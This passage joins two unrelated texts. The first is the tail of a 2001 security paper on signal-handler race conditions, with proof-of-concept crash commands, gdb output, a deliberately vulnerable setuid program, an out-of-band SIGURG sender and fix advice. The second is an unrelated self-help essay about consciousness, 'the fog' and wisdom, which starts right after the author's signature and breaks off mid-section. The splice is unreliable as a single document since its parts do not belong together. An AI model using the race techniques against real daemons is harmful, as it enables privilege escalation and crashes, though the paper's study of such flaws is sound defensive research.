$ PAD=`perl -e '{print "x"x410}'`
$ LOG=`perl -e '{print "A"x100}'`
$ ./vuln $LOG $PAD & sleep 1; killall -HUP vuln; sleep 1; killall -TERM vuln
The result should be a segmentation fault followed by a nice core dump
(for Linux glibc 2.1.9x and 2.0.7).
(gdb) back
#0 chunk_free (ar_ptr=0x4013dce0, p=0x80499a0) at malloc.c:3069
#1 0x4009b334 in __libc_free (mem=0x80499a8) at malloc.c:3043
#2 0x80485b8 in sh ()
#4 0x400d5971 in __libc_nanosleep () from /lib/libc.so.6
#5 0x400d5801 in sleep (seconds=10) at ../sysdeps/unix/sysv/linux/sleep.c:85
#6 0x80485d6 in sh ()
So, as you can see, the failure was caused when the signal handler was
re-entered. The __libc_free function was called with a parameter of
0x080499a8, which points somewhere in the middle of our AAAs:
(gdb) x/s 0x80499a8
0x80499a8: 'A' <repeats 94 times>, "\n"
You can find 0x41414141 in the registers, as well, showing this data
is being processed. For more analysis, please refer to the paper mentioned
above.
For the description, impact and fix information on Sendmail signal
handling vulnerability, please refer to the RAZOR advisory at:
http://razor.bindview.com/publish/advisories/adv_sm8120.html
Obviously, that is just an example of this attack. Whenever signal handler
execution is non-atomic, attacks of this kind are possible by re-entering
the handler when it is in the middle of performing non-reentrant operations.
Heap damage is the most obvious vector of attack, in this case, but not the
only one.
The attack described above usually requires specific conditions
to be met, and takes advantage of non-atomic signal handler execution,
which can be easily avoided by using additional flags or blocking
signal delivery.
But, since a signal can be delivered at any moment (unless explicitly
blocked), it is obviously possible to perform an attack without re-entering
the handler itself. It is enough to deliver a signal at an inopportune
moment. There are two attack schemes:
A) re-entering libc functions:
Every function that is not listed as reentrant-safe is a potential source
of vulnerabilities. Numerous library functions operate on global variables
and/or modify global state in a non-atomic way.
Once again, heap-management routines are probably the best example.
By delivering a signal while malloc(), free() or any other libcall of
this kind is executing, all subsequent calls to the heap-management
routines made from the signal handler have an unpredictable effect,
because the heap state is completely unpredictable to the programmer.
Other good examples are functions working on static/global variables
and buffers, like certain implementations of strtok(), inet_ntoa(),
gethostbyname() and so on. In all cases, results will be unpredictable,
as the sketch below illustrates.
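Here is a small sketch of mine (not from the paper) showing the static-state
problem with strtok(): if the handler calls strtok() while main() is in the
middle of tokenizing a string, the hidden position pointer is clobbered and
the rest of the parse is corrupted.

--- strtok_race.c (illustrative sketch, hypothetical file name) ---

#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static void handler(int sig) {
  (void)sig;
  char tmp[] = "a:b";
  /* This clobbers strtok()'s internal static position pointer, which
     afterwards refers into this soon-to-be-dead stack frame. */
  strtok(tmp, ":");
}

int main(void) {
  char line[] = "one,two,three,four";
  char *tok;

  signal(SIGTERM, handler);
  for (tok = strtok(line, ","); tok != NULL; tok = strtok(NULL, ",")) {
    printf("token: %s\n", tok);
    sleep(1);   /* deliver SIGTERM here and the rest of the parse is
                   corrupted - undefined behavior in practice */
  }
  return 0;
}

---- EOF ----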
B) interrupting non-atomic modifications:
This is basically the same problem, but outside library functions.
For example, the following code:
dropped_privileges = 1;
setuid(getuid());
is, technically speaking, using only safe library functions. But,
at the same time, it is possible to interrupt execution between the
assignment and the setuid() call, causing the signal handler to be executed
with the dropped_privileges flag set but superuser privileges not yet
dropped. This, very often, can be a source of serious problems.
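One way to close this particular window, sketched below under the assumption
that the dropped_privileges flag from the snippet above is consulted by the
handler, is to block signal delivery around the non-atomic update:

/* A sketch, not code from the paper; the flag is declared here as a
   sig_atomic_t so the handler can also read it safely. */
#include <signal.h>
#include <unistd.h>

volatile sig_atomic_t dropped_privileges = 0;

void drop_privileges_safely(void) {
  sigset_t block, old;

  /* Block all catchable signals while the flag and the real privilege
     state could disagree with each other. */
  sigfillset(&block);
  sigprocmask(SIG_BLOCK, &block, &old);

  dropped_privileges = 1;
  setuid(getuid());

  /* Restore the old mask; a signal delivered in the meantime is handled
     now, with a consistent view of the program state. */
  sigprocmask(SIG_SETMASK, &old, NULL);
}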
First of all, we would like to come back to the Sendmail example, to
demonstrate the potential consequences of re-entering libc. Note that the
signal handler is NOT re-entered - the signal is delivered only once:
#0 0x401705bc in chunk_free (ar_ptr=0x40212ce0, p=0x810f900) at malloc.c:3117
#1 0x4016fd12 in chunk_alloc (ar_ptr=0x40212ce0, nb=8200) at malloc.c:2601
#2 0x4016f7e6 in __libc_malloc (bytes=8192) at malloc.c:2703
#3 0x40168a27 in open_memstream (bufloc=0xbfff97bc, sizeloc=0xbfff97c0) at memstream.c:112
#4 0x401cf4fa in vsyslog (pri=6, fmt=0x80a5e03 "%s: %s", ap=0xbfff99ac) at syslog.c:142
#5 0x401cf447 in syslog (pri=6, fmt=0x80a5e03 "%s: %s") at syslog.c:102
#6 0x8055f64 in sm_syslog ()
#7 0x806793c in logsender ()
#8 0x8063902 in dropenvelope ()
#9 0x804e717 in finis ()
#10 0x804e9d8 in intsig () <---- SIGINT
#11 <signal handler called>
#12 chunk_alloc (ar_ptr=0x40212ce0, nb=4104) at malloc.c:2968
#13 0x4016f7e6 in __libc_malloc (bytes=4097) at malloc.c:2703
Heap corruption is caused by the interrupted malloc() call and, later, by
calling malloc() once again from the vsyslog() function invoked from the
handler.
There are two other examples of very interesting stack corruption caused by
re-entering heap management routines in the Sendmail daemon - in both cases,
the signal was delivered only once:
A)
#0 0x401705bc in chunk_free (ar_ptr=0xdbdbdbdb, p=0x810b8e8) at malloc.c:3117
#1 0xdbdbdbdb in ?? ()
B)
/.../
#9 0x79f68510 in ?? ()
Cannot access memory at address 0xc483c689
We'd like to leave this one as an exercise for the reader - try to figure
out why this happens and why this problem can be exploitable. For now,
we would like to come back to our second scenario, interrupting non-atomic
code, to show that targeting the heap is not the only possibility.
Some programs temporarily return to the superuser UID in cleanup
routines, e.g., in order to unlink specific files. Very often, by entering
the handler at the right moment, it is possible to perform all the cleanup
file access operations with superuser privileges.
Here's an example of such code, which can be found mainly in
interactive setuid software:
--- vuln2.c ---
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>    /* for printf() */
#include <unistd.h>   /* for the uid calls, sleep() and unlink() */

void sh(int dummy) {
  printf("Running with uid=%d euid=%d\n", getuid(), geteuid());
}

int main(int argc, char *argv[]) {
  seteuid(getuid());
  setreuid(0, getuid());
  signal(SIGTERM, sh);
  sleep(5);
  // this is temporarily privileged code:
  seteuid(0);
  unlink("tmpfile");
  sleep(5);
  // back to user privileges:
  seteuid(getuid());
  exit(0);
}
---- EOF ----
$ ./vuln & sleep 3; killall -TERM vuln; sleep 3; killall -TERM vuln
Running with uid=500 euid=500
Running with uid=500 euid=0
Such a coding practice can be found, for example, in the 'screen' utility
developed by Oliver Laumann. One of the most obvious locations is the
CoreDump handler [screen.c]:
static sigret_t
CoreDump SIGDEFARG
{
/.../
setgid(getgid());
setuid(getuid());
unlink("core");
/.../
SIGSEGV can be delivered in the middle of the user-initiated screen detach
routine, for example. To better understand what is going on and why,
here's strace output for the detach (Ctrl+A, D) command:
23534 geteuid() = 0
23534 geteuid() = 0
23534 getuid() = 500
23534 setreuid(0, 500) = 0 HERE IT HAPPENS
23534 getegid() = 500
23534 chmod("/home/lcamtuf/.screen/23534.tty5.nimue", 0600) = 0
23534 utime("/home/lcamtuf/.screen/23534.tty5.nimue", NULL) = 0
23534 geteuid() = 500
23534 getuid() = 0
The marked line sets the real uid to zero. If SIGSEGV is delivered somewhere
near this point, the CoreDump() handler runs with superuser privileges,
because its initial setuid(getuid()) call now sets the uid to 0.
This is a very interesting issue, directly related to re-entering libc
functions and/or interrupting non-atomic code. Many complex daemons,
like ftpd, some http/proxy services, MTAs, etc., have SIGURG handlers
declared - very often these handlers are pretty verbose, calling syslog()
or freeing resources allocated for a specific connection. The trick is that
SIGURG, obviously, can be delivered over the network, using a TCP/IP
out-of-band (OOB) message. Thus, it is possible to perform attacks over
the network layer without any privileges.
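To make the remote delivery concrete, here is a minimal sketch of mine (the
address and port are placeholders, not targets taken from the paper): a single
byte of TCP urgent data sent with MSG_OOB is enough to raise SIGURG in a peer
process that owns the connection and has arranged to receive the signal.

--- oob_send.c (illustrative sketch, hypothetical file name) ---

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
  struct sockaddr_in sa;
  int s = socket(AF_INET, SOCK_STREAM, 0);
  if (s < 0) { perror("socket"); return 1; }

  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(21);                        /* e.g. an FTP control port */
  inet_pton(AF_INET, "192.0.2.1", &sa.sin_addr);  /* placeholder address */

  if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
    perror("connect");
    return 1;
  }

  /* One byte of urgent (out-of-band) data; the peer process receives
     SIGURG if it has arranged to be notified about urgent data. */
  if (send(s, "x", 1, MSG_OOB) < 0)
    perror("send MSG_OOB");

  close(s);
  return 0;
}

---- EOF ----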
Below is a SIGURG handler routine, which, with small modifications,
is shared both by BSD ftpd and WU-FTPD daemons:
static VOIDRET myoob FUNCTION((input), int input)
{
/.../
if (getline(cp, 7, stdin) == NULL) {
reply(221, "You could at least say goodbye.");
dologout(0);
}
/.../
}
As you can see, under certain conditions the dologout() function is called.
This routine looks like this:
dologout(int status)
{
/.../
if (logged_in) {
delay_signaling(); /* we can't allow any signals while euid==0: kinch */
(void) seteuid((uid_t) 0);
wu_logwtmp(ttyline, "", "");
}
if (logging)
syslog(LOG_INFO, "FTP session closed");
/.../
}
As you can see, the authors took an additional precaution not to allow
signal delivery in the "logged_in" case. Unfortunately, syslog() is
a perfect example of a libc function that should NOT be called during
signal handling, regardless of whether "logged_in" or any other
special condition happens to be in effect.
As mentioned before, heap management functions such as malloc() are
called within syslog(), and these functions are not atomic. The OOB
message might arrive when the heap is in virtually any possible state.
Playing with uids / privileges / internal state is an option as well.
In most cases, hitting the right moment is a non-issue for local attacks,
as the attacker can control the execution environment (e.g., the load
average, the number of local files that the daemon needs to access, etc.)
and can try a virtually unlimited number of times by invoking the same
program over and over again, increasing the chance of delivering the signal
at a given point. For remote attacks, timing is a bigger issue, but as long
as the attack itself doesn't cause the service to stop responding, thousands
of attempts can be performed.
Fixing these problems is a very complex and difficult task. There are at
least three aspects to it:

 - Using only reentrant-safe libcalls in signal handlers. This would
   require major rewrites of numerous programs. Another half-solution is
   to implement a wrapper around every insecure libcall used, checking a
   special global flag in order to avoid re-entry,

 - Blocking signal delivery during all non-atomic operations and/or
   constructing signal handlers in a way that does not rely on internal
   program state (e.g. unconditionally setting a specific flag and
   nothing else),

 - Blocking signal delivery in signal handlers.
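For the last point, sigaction() already provides the mechanism. Here is a
sketch (mine, not code from any of the programs discussed) that installs the
shared handler from the first example so that both signals are blocked while
it runs, preventing the SIGHUP-then-SIGTERM re-entry described earlier:

/* A sketch; assumes the sighndlr() function from the earlier example. */
#include <signal.h>
#include <string.h>

extern void sighndlr(int dummy);

void install_handlers(void) {
  struct sigaction sa;

  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = sighndlr;
  sa.sa_flags = 0;

  /* Block both signals for the duration of the handler, so delivering
     SIGTERM during the SIGHUP cleanup no longer re-enters sighndlr(). */
  sigemptyset(&sa.sa_mask);
  sigaddset(&sa.sa_mask, SIGHUP);
  sigaddset(&sa.sa_mask, SIGTERM);

  sigaction(SIGHUP, &sa, NULL);
  sigaction(SIGTERM, &sa, NULL);
}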
Michal Zalewski
<lcamtuf@razor.bindview.com>
16-17 May, 2001
The mind…can make a heaven of hell, a hell of heaven. ― John Milton
The mind is certainly its own cosmos. — Alan Lightman
You go to school, study hard, get a degree, and you’re pleased with yourself. But are you wiser?
You get a job, achieve things at the job, gain responsibility, get paid more, move to a better company, gain even more responsibility, get paid even more, rent an apartment with a parking spot, stop doing your own laundry, and you buy one of those $9 juices where the stuff settles down to the bottom. But are you happier?
You do all kinds of life things—you buy groceries, read articles, get haircuts, chew things, take out the trash, buy a car, brush your teeth, shit, sneeze, shave, stretch, get drunk, put salt on things, have sex with someone, charge your laptop, jog, empty the dishwasher, walk the dog, buy a couch, close the curtains, button your shirt, wash your hands, zip your bag, set your alarm, fix your hair, order lunch, act friendly to someone, watch a movie, drink apple juice, and put a new paper towel roll on the thing.
But as you do these things day after day and year after year, are you improving as a human in a meaningful way?
In the last post, I described the way my own path had led me to be an atheist—but how in my satisfaction with being proudly nonreligious, I never gave serious thought to an active approach to internal improvement—hindering my own evolution in the process.
This wasn’t just my own naiveté at work. Society at large focuses on shallow things, so it doesn’t stress the need to take real growth seriously. The major institutions in the spiritual arena—religions—tend to focus on divinity over people, making salvation the end goal instead of self-improvement. The industries that do often focus on the human condition—philosophy, psychology, art, literature, self-help, etc.—lie more on the periphery, with their work often fragmented from each other. All of this sets up a world that makes it hard to treat internal growth as anything other than a hobby, an extra-curricular, icing on the life cake.
Considering that the human mind is an ocean of complexity that creates every part of our reality, working on what’s going on in there seems like it should be a more serious priority. In the same way a growing business relies on a clear mission with a well thought-out strategy and measurable metrics, a growing human needs a plan—if we want to meaningfully improve, we need to define a goal, understand how to get there, become aware of obstacles in the way, and have a strategy to get past them.
When I dove into this topic, I thought about my own situation and whether I was improving. The efforts were there—apparent in many of this blog’s post topics—but I had no growth model, no real plan, no clear mission. Just kind of haphazard attempts at self-improvement in one area or another, whenever I happened to feel like it. So I’ve attempted to consolidate my scattered efforts, philosophies, and strategies into a single framework—something solid I can hold onto in the future—and I’m gonna use this post to do a deep dive into it.
So settle in, grab some coffee, and get your brain out and onto the table in front of you—you’ll want to have it there to reference as we explore what a weird, complicated object it is.
The Goal
Wisdom. More on that later.
How Do We Get to the Goal?
By being aware of the truth. When I say “the truth,” I’m not being one of those annoying people who says the word truth to mean some amorphous, mystical thing—I’m just referring to the actual facts of reality. The truth is a combination of what we know and what we don’t know—and gaining and maintaining awareness of both sides of this reality is the key to being wise.
Easy, right? We don’t have to know more than we know, we only have to be aware of what we know and what we don’t know. Truth is in plain sight, written on the whiteboard—we just have to look at the board and reflect upon it. There’s just this one thing—
What’s in Our Way?
The fog.
To understand the fog, let’s first be clear that we’re not here:
Evolution
We’re here:
Evolution Plus
And this isn’t the situation:
consciousness binary
This is:
consciousness spectrum
This is a really hard concept for humans to absorb, but it’s the starting place for growth. Declaring ourselves “conscious” allows us to call it a day and stop thinking about it. I like to think of it as a consciousness staircase:
big staircase
An ant is more conscious than a bacterium, a chicken more than an ant, a monkey more than a chicken, and a human more than a monkey. But what’s above us?
A) Definitely something, and B) Nothing we can understand better than a monkey can understand our world and how we think.
There’s no reason to think the staircase doesn’t extend upwards forever. The red alien a few steps above us on the staircase would see human consciousness the same way we see that of an orangutan—they might think we’re pretty impressive for an animal, but that of course we don’t actually begin to understand anything. Our most brilliant scientist would be outmatched by one of their toddlers.
To the green alien up there higher on the staircase, the red alien might seem as intelligent and conscious as a chicken seems to us. And when the green alien looks at us, it sees the simplest little pre-programmed ants.
We can’t conceive of what life higher on the staircase would be like, but absorbing the fact that higher stairs exist and trying to view ourselves from the perspective of one of those steps is the key mindset we need to be in for this exercise.
For now, let’s ignore those much higher steps and just focus on the step right above us—that light green step. A species on that step might think of us like we think of a three-year-old child—emerging into consciousness through a blur of simplicity and naiveté. Let’s imagine that a representative from that species was sent to observe humans and report back to his home planet about them—what would he think of the way we thought and behaved? What about us would impress him? What would make him cringe?
I think he’d very quickly see a conflict going on in the human mind. On one hand, all of those steps on the staircase below the human are where we grew from. Hundreds of millions of years of evolutionary adaptations geared toward animal survival in a rough world are very much rooted in our DNA, and the primitive impulses in us have birthed a bunch of low-grade qualities—fear, pettiness, jealousy, greed, instant-gratification, etc. Those qualities are the remnants of our animal past and still a prominent part of our brains, creating a zoo of small-minded emotions and motivations in our heads:
normal animal brain
But over the past six million years, our evolutionary line has experienced a rapid growth in consciousness and the incredible ability to reason in a way no other species on Earth can. We’ve taken a big step up the consciousness staircase, very quickly—let’s call this burgeoning element of higher consciousness our Higher Being.
Higher Being
The Higher Being is brilliant, big-thinking, and totally rational. But on the grand timescale, he’s a very new resident in our heads, while the primal animal forces are ancient, and their coexistence in the human mind makes it a strange place:
animal + higher being
So it’s not that a human is the Higher Being and the Higher Being is three years old—it’s that a human is the combination of the Higher Being and the low-level animals, and they blend into the three-year-old that we are. The Higher Being alone would be a more advanced species, and the animals alone would be one far more primitive, and it’s their particular coexistence that makes us distinctly human.
As humans evolved and the Higher Being began to wake up, he looked around your brain and found himself in an odd and unfamiliar jungle full of powerful primitive creatures that didn’t understand who or what he was. His mission was to give you clarity and high-level thought, but with animals tramping around his work environment, it wasn’t an easy job. And things were about to get much worse. Human evolution continued to make the Higher Being more and more sentient, until one day, he realized something shocking:
WE’RE GOING TO DIE
It marked the first time any species on planet Earth was conscious enough to understand that fact, and it threw all of those animals in the brain—who were not built to handle that kind of information—into a complete frenzy, sending the whole ecosystem into chaos:
chaotic brain
The animals had never experienced this kind of fear before, and their freakout about this—one that continues today—was the last thing the Higher Being needed as he was trying to grow and learn and make decisions for us.
The adrenaline-charged animals romping around our brain can take over our mind, clouding our thoughts, judgment, sense of self, and understanding of the world. The collective force of the animals is what I call “the fog.” The more the animals are running the show and making us deaf and blind to the thoughts and insights of the Higher Being, the thicker the fog is around our head, often so thick we can only see a few inches in front of our face:
fog head
Let’s think back to our goal above and our path to it—being aware of the truth. The Higher Being can see the truth just fine in almost any situation. But when the fog is thick around us, blocking our eyes and ears and coating our brain, we have no access to the Higher Being or his insight. This is why being continually aware of the truth is so hard—we’re too lost in the fog to see it or think about it.
And when the alien representative is finished observing us and heads back to his home planet, I think this would be his sum-up of our problems:
The battle of the Higher Being against the animals—of trying to see through the fog to clarity—is the core internal human struggle.
This struggle in our heads takes place on many fronts. We’ve examined a few of them here: the Higher Being (in his role as the Rational Decision Maker) fighting the Instant Gratification Monkey; the Higher Being (in the role of the Authentic Voice) battling against the overwhelmingly scared Social Survival Mammoth; the Higher Being’s message that life is just a bunch of Todays getting lost in the blinding light of fog-based yearning for better tomorrows. Those are all part of the same core conflict between our primal past and our enlightened future.
The shittiest thing about the fog is that when you’re in the fog, it blocks your vision so you can’t see that you’re in the fog. It’s when the fog is thickest that you’re the least aware that it’s there at all—it makes you unconscious. Being aware that the fog exists and learning how to recognize it is the key first step to rising up in consciousness and becoming a wiser person.
So we’ve established that our goal is wisdom, that to get there we need to become as aware as possible of the truth, and that the main thing standing in our way is the fog. Let’s zoom in on the battlefield to look at why “being aware of the truth” is so important and how we can overcome the fog to get there:
The Battlefield
No matter how hard we tried, it would be impossible for humans to access that light green step one above us on the consciousness staircase. Our advanced capability—the Higher Being—just isn’t there yet. Maybe in a million years or two. For now, the only place this battle can happen is on the one step where we live, so that’s where we’re going to zoom in. We need to focus on the mini spectrum of consciousness within our step, which we can do by breaking our step down into four substeps:
substeps
Climbing this mini consciousness staircase is the road to truth, the way to wisdom, my personal mission for growth, and a bunch of other cliché statements I never thought I’d hear myself say. We just have to understand the game and work hard to get good at it.
Let’s look at each step to try to understand the challenges we’re dealing with and how we can make progress:
Step 1: Our Lives in the Fog
Step 1 is the lowest step, the foggiest step, and unfortunately, for most of us it’s our default level of existence. On Step 1, the fog is all up in our shit, thick and close and clogging our senses, leaving us going through life unconscious. Down here, the thoughts, values, and priorities of the Higher Being are completely lost in the blinding fog and the deafening roaring, tweeting, honking, howling, and squawking of the animals in our heads. This makes us 1) small-minded, 2) short-sighted, and 3) stupid. Let’s discuss each of these:
1) On Step 1, you’re terribly small-minded because the animals are running the show.
When I look at the wide range of motivating emotions that humans experience, I don’t see them as a scattered range, but rather falling into two distinct bins: the high-minded, love-based, advanced emotions of the Higher Being, and the small-minded, fear-based, primitive emotions of our brain animals.
And on Step 1, we’re completely intoxicated by the animal emotions as they roar at us through the dense fog.
animals in fog
This is what makes us petty and jealous and what makes us so thoroughly enjoy the misfortune of others. It’s what makes us scared, anxious, and insecure. It’s why we’re self-absorbed and narcissistic; vain and greedy; narrow-minded and judgmental; cold, callous, and even cruel. And only on Step 1 do we feel that primitive “us versus them” tribalism that makes us hate people different than us.
You can find most of these same emotions in a clan of capuchin monkeys—and that makes sense, because at their core, these emotions can be boiled down to the two keys of animal survival: self-preservation and the need to reproduce.
Step 1 emotions are brutish and powerful and grab you by the collar, and when they’re upon you, the Higher Being and his high-minded, love-based emotions are shoved into the sewer.
2) On Step 1, you’re short-sighted, because the fog is six inches in front of your face, preventing you from seeing the big picture.
The fog explains all kinds of totally illogical and embarrassingly short-sighted human behavior.
Why else would anyone ever take a grandparent or parent for granted while they’re around, seeing them only occasionally, opening up to them only rarely, and asking them barely any questions—even though after they die, you can only think about how amazing they were and how you can’t believe you didn’t relish the opportunity to enjoy your relationship with them and get to know them better when they were around?
Why else would people brag so much, even though if they could see the big picture, it would be obvious that everyone finds out about the good things in your life eventually either way—and that you always serve yourself way more by being modest?
Why else would someone do the bare minimum at work, cut corners on work projects, and be dishonest about their efforts—when anyone looking at the big picture would know that in a work environment, the truth about someone’s work habits eventually becomes completely apparent to both bosses and colleagues, and you’re never really fooling anyone? Why would someone insist on making sure everyone knows when they did something valuable for the company—when it should be obvious that acting that way is transparent and makes it seem like you’re working hard just for the credit, while just doing things well and having one of those things happen to be noticed does much more for your long term reputation and level of respect at the company?
If not for thick fog, why would anyone ever pinch pennies over a restaurant bill or keep an unpleasantly-rigid scorecard of who paid for what on a trip, when everyone reading this could right now give each of their friends a quick and accurate 1-10 rating on the cheap-to-generous (or selfish-to-considerate) scale, and the few hundred bucks you save over time by being on the cheap end of the scale is hardly worth it considering how much more likable and respectable it is to be generous?
What other explanation is there for the utterly inexplicable decision by so many famous men in positions of power to bring down the career and marriage they spent their lives building by having an affair?
And why would anyone bend and loosen their integrity for tiny insignificant gains when integrity affects your long-term self-esteem and tiny insignificant gains affect nothing in the long term?
How else could you explain the decision by so many people to let the fear of what others might think dictate the way they live, when if they could see clearly they’d realize that A) that’s a terrible reason to do or not do something, and B) no one’s really thinking about you anyway—they’re buried in their own lives.
And then there are all the times when someone’s opaque blinders keep them in the wrong relationship, job, city, apartment, friendship, etc. for years, sometimes decades, only for them to finally make a change and say “I can’t believe I didn’t do this earlier,” or “I can’t believe I couldn’t see how wrong that was for me.” They should absolutely believe it, because that’s the power of the fog.
3) On Step 1, you’re very, very stupid.
One way this stupidity shows up is in us making the same obvious mistakes over and over and over again.1
The most glaring example is the way the fog convinces us, time after time after time, that certain things will make us happy that in reality absolutely don’t. The fog lines up a row of carrots, tells us that they’re the key to happiness, and tells us to forget today’s happiness in favor of directing all of our hope to all the happiness the future will hold because we’re gonna get those carrots.
And even though the fog has proven again and again that it has no idea how human happiness works—even though we’ve had so many experiences finally getting a carrot and feeling a ton of temporary happiness, only to watch that happiness fade right back down to our default level a few days later—we continue to fall for the trick.
It’s like hiring a nutritionist to help you with your exhaustion, and they tell you that the key is to drink an espresso shot anytime you’re tired. So you’d try it and think the nutritionist was a genius until an hour later when it dropped you like an anvil back into exhaustion. You go back to the nutritionist, who gives you the same advice, so you try it again and the same thing happens. That would probably be it, right? You’d fire the nutritionist. Right? So why are we so gullible when it comes to the fog’s advice on happiness and fulfillment?
The fog is also much more harmful than the nutritionist because not only does it give us terrible advice—but the fog itself is the source of unhappiness. The only real solution to exhaustion is to sleep, and the only real way to improve happiness in a lasting way is to make progress in the battle against the fog.
There’s a concept in psychology called The Hedonic Treadmill, which suggests that humans have a stagnant default happiness level and when something good or bad happens, after an initial change in happiness, we always return to that default level. And on Step 1, this is completely true of course, given that trying to become permanently happier while in the fog is like trying to dry your body off while standing under the shower with the water running.
But I refuse to believe the same species that builds skyscrapers, writes symphonies, flies to the moon, and understands what a Higgs boson is is incapable of getting off the treadmill and actually improving in a meaningful way.
I think the way to do it is by learning to climb this consciousness staircase to spend more of our time on Steps 2, 3, and 4, and less of it mired unconsciously in the fog.
Step 2: Thinning the Fog to Reveal Context
Humans can do something amazing that no other creature on Earth can do—they can imagine. If you show an animal a tree, they see a tree. Only a human can imagine the acorn that sunk into the ground 40 years earlier, the small flimsy stalk it was at three years old, how stark the tree must look when it’s winter, and the eventual dead tree lying horizontally in that same place.
This is the magic of the Higher Being in our heads.
On the other hand, the animals in your head, like their real world relatives, can only see a tree, and when they see one, they react instantly to it based on their primitive needs. When you’re on Step 1, your unconscious animal-run state doesn’t even remember that the Higher Being exists, and his genius abilities go to waste.
Step 2 is all about thinning out the fog enough to bring the Higher Being’s thoughts and abilities into your consciousness, allowing you to see behind and around the things that happen in life. Step 2 is about bringing context into your awareness, which reveals a far deeper and more nuanced version of the truth.
There are plenty of activities or undertakings that can help thin out your fog. To name three:
1) Learning more about the world through education, travel, and life experience—as your perspective broadens, you can see a clearer and more accurate version of the truth.
2) Active reflection. This is what a journal can help with, or therapy, which is basically examining your own brain with the help of a fog expert. Sometimes a hypothetical question can be used as “fog goggles,” allowing you to see something clearly through the fog—questions like, “What would I do if money were no object?” or “How would I advise someone else on this?” or “Will I regret not having done this when I’m 80?” These questions are a way to ask your Higher Being’s opinion on something without the animals realizing what’s going on, so they’ll stay calm and the Higher Being can actually talk—like when parents spell out a word in front of their four-year-old when they don’t want him to know what they’re saying.2
3) Meditation, exercise, yoga, etc.—activities that help quiet the brain’s unconscious chatter, i.e. allowing the fog to settle.
But the easiest and most effective way to thin out the fog is simply to be aware of it. By knowing that fog exists, understanding what it is and the different forms it takes, and learning to recognize when you’re in it, you hinder its ability to run your life. You can’t get to Step 2 if you don’t know when you’re on Step 1.
The way to move onto Step 2 is by remembering to stay aware of the context behind and around what you see, what you come across, and the decisions you make. That’s it—remaining cognizant of the fog and remembering to look at the whole context keeps you conscious, aware of reality, and as you’ll see, makes you a much better version of yourself than you are on Step 1. Some examples—
Here’s what a rude cashier looks like on Step 1 vs. Step 2:
cashier
Here’s what gratitude looks like:
gratitude
Something good happening:
good thing
Something bad happening:
bad thing
That phenomenon where everything suddenly seems horrible late at night in bed:
late night
A flat tire:
flat tire
Long-term consequences:
consequences
Looking at context makes us aware how much we actually know about most situations (as well as what we don’t know, like what the cashier’s day was like so far), and it reminds us of the complexity and nuance of people, life, and situations. When we’re on Step 2, this broader scope and increased clarity makes us feel calmer and less fearful of things that aren’t actually scary, and the animals—who gain their strength from fear and thrive off of unconsciousness—suddenly just look kind of ridiculous:
animals clump
When the small-minded animal emotions are less in our face, the more advanced emotions of the Higher Being—love, compassion, humility, empathy, etc.—begin to light up.
The good news is there’s no learning required to be on Step 2—your Higher Being already knows the context around all of these life situations. It doesn’t take hard work, and no additional information or expertise is needed—you only have to consciously think about being on Step 2 instead of Step 1 and you’re there. You’re probably there right now just by reading this.
The bad news is that it’s extremely hard to stay on Step 2 for long. The Catch-22 here is that it’s not easy to stay conscious of the fog because the fog makes you unconscious.
That’s the first challenge at hand. You can’t get rid of the fog, and you can’t always keep it thin, but you can get better at noticing when it’s thick and develop effective strategies for thinning it out whenever you consciously focus on it. If you’re evolving successfully, as you get older, you should be spending more and more time on Step 2 and less and less on Step 1.
Step 3: Shocking Reality
I . . . a universe of atoms . . . an atom in the universe. —Richard Feynman
Step 3 is when things start to get weird. Even on the more enlightened Step 2, we kind of think we’re here:
happy earth land
As delightful as that is, it’s a complete delusion. We live our days as if we’re just here on this green and brown land with our blue sky and our chipmunks and our caterpillars. But this is actually what’s happening:
Little Earth
But even more actually, this is happening:
We also tend to kind of think this is the situation:
life timeline
When really, it’s this:
long timeline
You might even think you’re a thing. Do you?
Thing
No, you’re a ton of these:
atom
This is the next iteration of truth on our little staircase, and our brains can’t really handle it. Asking a human to internalize the vastness of space or the eternity of time or the tininess of atoms is like asking a dog to stand up on its hind legs—you can do it if you focus, but it’s a strain and you can’t hold it for very long.3
You can think about the facts anytime—The Big Bang was 13.8 billion years ago, which is about 130,000 times longer than humans have existed; if the sun were a ping pong ball in New York, the closest star to us would be a ping pong ball in Atlanta; the Milky Way is so big that if you made a scale model of it that was the size of the US, you would still need a microscope to see the sun; atoms are so small that there are about as many atoms in one grain of salt as there are grains of sand on all the beaches on Earth. But once in a while, when you deeply reflect on one of these facts, or when you’re in the right late night conversation with the right person, or when you’re staring at the stars, or when you think too hard about what death actually means—you have a Whoa moment.
A true Whoa moment is hard to come by and even harder to maintain for very long, like our dog’s standing difficulties. Thinking about this level of reality is like looking at an amazing photo of the Grand Canyon; a Whoa moment is like being at the Grand Canyon—the two experiences are similar but somehow vastly different. Facts can be fascinating, but only in a Whoa moment does your brain actually wrap itself around true reality. In a Whoa moment, your brain for a second transcends what it’s been built to do and offers you a brief glimpse into the astonishing truth of our existence. And a Whoa moment is how you get to Step 3.
I love Whoa moments. They make me feel some intense combination of awe, elation, sadness, and wonder. More than anything, they make me feel ridiculously, profoundly humble—and that level of humility does weird things to a person. In those moments, all those words religious people use—awe, worship, miracle, eternal connection—make perfect sense. I want to get on my knees and surrender. This is when I feel spiritual.
And in those fleeting moments, there is no fog—my Higher Being is in full flow and can see everything in perfect clarity. The normally-complicated world of morality is suddenly crystal clear, because the only fathomable emotions on Step 3 are the most high-level. Any form of pettiness or hatred is a laughable concept up on Step 3—with no fog to obscure things, the animals are completely naked, exposed for the sad little creatures that they are.
animals embarrassed
On Step 1, I snap back at the rude cashier, who had the nerve to be a dick to me. On Step 2, the rudeness doesn’t faze me because I know it’s about him, not me, and that I have no idea what his day or life has been like. On Step 3, I see myself as a miraculous arrangement of atoms in vast space that for a split second in endless eternity has come together to form a moment of consciousness that is my life…and I see that cashier as another moment of consciousness that happens to exist on the same speck of time and space that I do. And the only possible emotion I could have for him on Step 3 is love.
cashier 2
In a Whoa moment’s transcendent level of consciousness, I see every interaction, every motivation, every news headline in unusual clarity—and difficult life decisions are much more obvious. I feel wise.
